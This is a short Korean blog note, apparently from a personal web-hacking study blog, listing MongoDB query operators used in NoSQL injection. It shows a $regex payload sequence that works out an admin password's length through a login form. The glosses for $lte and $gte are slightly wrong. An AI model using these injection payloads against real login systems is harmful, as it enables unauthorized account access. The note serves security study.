웹 해킹 - NoSQL Injection 조건 표현식

728x90

NoSQL injection - HackTricks

Brute-force login usernames and passwords from POST login

book.hacktricks.xyz

[$ne] : 같지 않을 경우(not equals)

[$regex] : 정규표현식

[$eq] : 같다(=)

[$lt] : 작다(<)

[$gt] : 크다(>)

[$lte] : 작거나 같다(<)

[$gte] : 크거나 같다(>)

$regex로 패스워드 길이 알아내기

"password": {"$regex":".{1}"} => admin

"password": {"$regex":".{2}"} => admin

...

"password": {"$regex":".{5}"} => admin (5 글자!)

"password": {"$regex":".{6}"} => undefined

728x90

웹 해킹 - sqlmap (0)	2022.07.24
웹 해킹 - 웹 패킷 전송 확장 프로그램 (0)	2021.12.09
웹 해킹 - 크롬 스파이웨어 확장 프로그램 , Bad Extension (0)	2021.12.08
웹 해킹 - XSS 공격으로 document.cookie 정보 가져오기 방지(HttpOnly) (0)	2021.11.25
[WEB-HACKING] HTML 이벤트 속성 모음 & XSS 응용 (0)	2021.11.15

HackLog